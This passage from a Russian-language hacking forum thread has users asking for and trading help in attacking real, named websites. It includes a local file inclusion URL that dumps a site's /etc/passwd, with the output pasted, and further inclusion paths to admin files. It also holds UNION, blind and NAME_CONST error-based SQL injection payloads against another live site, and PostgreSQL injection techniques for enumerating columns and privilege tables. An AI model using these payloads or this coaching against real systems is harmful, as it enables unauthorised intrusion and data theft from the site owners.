Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    нужно вместо принтабельного столбца ввести слово database()
     
  2. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    Всем привет, как можно узнать версию джумлы?
     
  3. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    SeNaP, тебе сюда:

    http://forum.antichat.ru/thread106899.html
     
  4. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    328
    Likes Received:
    142
    Reputations:
    81
    можно еще 0x0a, 0x0c, 0x0b, 0x09 или любой символ неиспользуемый мускулом.
    если версия => 5 то смотри в schema_name из таблицы schemata
    UPD: немного неправильно понял, вообщем таким образом можно узнать полный список баз )
     
  5. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    у меня невыйшло проинклудить,может кто круче шарит и сможет расскрутить багу?

    http://www.e-quilibres.net/pages/page.php?rub=gen&p=/tmp/sess_5ulcekq6qo696vjsi4jn71ut57
     
  6. HackUA

    HackUA New Member

    Joined:
    10 Dec 2009
    Messages:
    10
    Likes Received:
    2
    Reputations:
    0
    http://www.e-quilibres.net/pages/page.php?rub=gen&p=/etc/passwd

    root:x:0:0::/root:/bin/bash bin:x:1:1:bin:/bin: daemon:x:2:2:daemon:/sbin: adm:x:3:4:adm:/var/log: lp:x:4:7:lp:/var/spool/lpd: sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/: news:x:9:13:news:/usr/lib/news: uucp:x:10:14:uucp:/var/spool/uucppublic: operator:x:11:0:eek:perator:/root:/bin/bash games:x:12:100:games:/usr/games: ftp:x:14:50::/home/ftp: smmsp:x:25:25:smmsp:/var/spool/clientmqueue: mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bash rpc:x:32:32:RPC portmap user:/:/bin/false sshd:x:33:33:sshd:/: gdm:x:42:42:GDM:/var/state/gdm:/bin/bash pop:x:90:90:pOP:/: nobody:x:99:99:nobody:/:
     
  7. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    601
    Likes Received:
    116
    Reputations:
    37
    Вот помогите мне разобраться:
    Как я понял, здесь отключены ошибки т.к. при вводе знак " ' ", не было ошибки.
    Как можно здесь раскрутить скулю? Я пробивал перед "3142" ставить " - ", тогда страница изменилась.
    Подскажите, что делать с этим сайтом?
     
  8. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    http://www.e-quilibres.net/pages/page.php?rub=gen&p=../adm/.htaccess&Id=185
    
    http://www.e-quilibres.net/pages/page.php?rub=gen&p=/web/sites/vhbu/8/30/74216/public/www/.siteadmin&Id=185
    
    http://www.e-quilibres.net/adm/
    
    /web/sites/vhbu/8/30/74216/public/www/
    
     
    1 person likes this.
  9. auth_root

    auth_root Member

    Joined:
    31 Jan 2010
    Messages:
    17
    Likes Received:
    10
    Reputations:
    0
    Помогите раскрутить

    http://www.bre3zah.com/youtubes/admintest/videos/managevideos.php?x=20'

    варнинги сыпет, но подобрать поля или обрезать запрос не получается...
     
  10. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    Code:
    http://www.pinskdrev.by/catalog.php?sub_id=6+union+select+1,2,3,4,5,6,7,8,9,10,11+--+
    Объяснит мне кто-нибудь, что делать когда есть два запроса в скрипте?
     
  11. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    http://www.pinskdrev.by/catalog.php?sub_id=6+and+substring(version(),1,1)=5
    
    http://www.pinskdrev.by/catalog.php?sub_id=(SELECT+*+FROM(SELECT+*+FROM(SELECT+NAME_CONST((version()),14)d)+as+t+JOIN+(SELECT+NAME_CONST((version()),14)e)b)a)
    
    5.0.32-Debian_7etch5-log
     
    2 people like this.
  12. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Blind
    Code:
    http://www.pinskdrev.by/catalog.php?sub_id=6+and+substring(version(),1,1)=5
    PS: Забыл о выводе через name_const :)
     
    #11412 mailbrush, 14 Feb 2010
    Last edited: 14 Feb 2010
    1 person likes this.
  13. 0nep@t0p

    0nep@t0p Elder - Старейшина

    Joined:
    25 May 2007
    Messages:
    134
    Likes Received:
    216
    Reputations:
    17
    2 auth_root
    там, походу, инъекция после лимита, да еще и с ордер баем, а при таком сочетании, насколько мне известно, инъекцию провести невозможно :(
     
    2 people like this.
  14. samarin

    samarin Elder - Старейшина

    Joined:
    24 Feb 2008
    Messages:
    136
    Likes Received:
    31
    Reputations:
    1
    PostgreSQL 8.3.7
    -------------------------------------
    Подскажите с конструкцией типа:
    select+column_name::text::boolean+from+information_schema.columns--
    в ответ
    select+column_name::text::boolean+from+information_schema.columns+where+column_name+not+in($$typname$$)----
    Я так понимаю typename и typenamespace - это названия колонок. Но как дальше перебирать конструкцией not in?

    При проверке же
    в ответ страница без ошибок и нужной мне информации
    если
    то

    select+column_name::text::boolean+from+information_schema.columns+limit+1+offset+0--
    в этой же конструкции ни лимит ни оффсет ничего не меняет.
     
    #11414 samarin, 15 Feb 2010
    Last edited: 15 Feb 2010
  15. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,507
    Likes Received:
    389
    Reputations:
    101
    Так и перебирать
    Code:
    not+in($$typname$$,$$typnamespace$$,$$other_column$$)
    
    и т.д. А чем LIMIT ... OFFSET ... не нравится для перебора таблиц?
     
    1 person likes this.
  16. samarin

    samarin Elder - Старейшина

    Joined:
    24 Feb 2008
    Messages:
    136
    Likes Received:
    31
    Reputations:
    1
    Спасибо, уже хоть что-то заработало :)
    Изменение же LIMIT ... OFFSET на вывод не влияет, как выдал он tmplname, так его и выдает
     
  17. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,507
    Likes Received:
    389
    Reputations:
    101
    лимит менять не стоит, изменяется оффсет. Если по какой-то причине не удается получить инфу из pg_user, то попробуйте выяснить о статусе поля usesuper косвенно, например, обратившись к pg_shadow / pg_authid. Также не исключено отсутствие прав на pg_user, следовательно, usesuper = false

    Added. Проверил сейчас в консоли. Запросы
    Code:
    select column_name::text::boolean from information_schema.columns order by 1 limit 1 offset 2;
    select column_name::text::boolean from information_schema.columns order by 1 limit 1 offset 3;
    select column_name::text::boolean from information_schema.columns order by 1 limit 1 offset 1000;
    
    выдает один и тот же результат
     
    #11417 krypt3r, 15 Feb 2010
    Last edited: 15 Feb 2010
  18. samarin

    samarin Elder - Старейшина

    Joined:
    24 Feb 2008
    Messages:
    136
    Likes Received:
    31
    Reputations:
    1
    это-то понятно,
    ничего в выводе не меняется

    к pg_shadow нет доступа
     
  19. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,507
    Likes Received:
    389
    Reputations:
    101
    так, попробуйте по-другому запрос составить
    Code:
    select column_name::text::boolean from (select column_name from information_schema.columns limit 1 offset 2)q;
    
     
  20. CyberHunter

    CyberHunter Active Member

    Joined:
    6 Jan 2010
    Messages:
    601
    Likes Received:
    116
    Reputations:
    37
    Помогите разобраться(если кому не лень с объяснениями) :
    Заранее спс!
     
Thread Status:
Not open for further replies.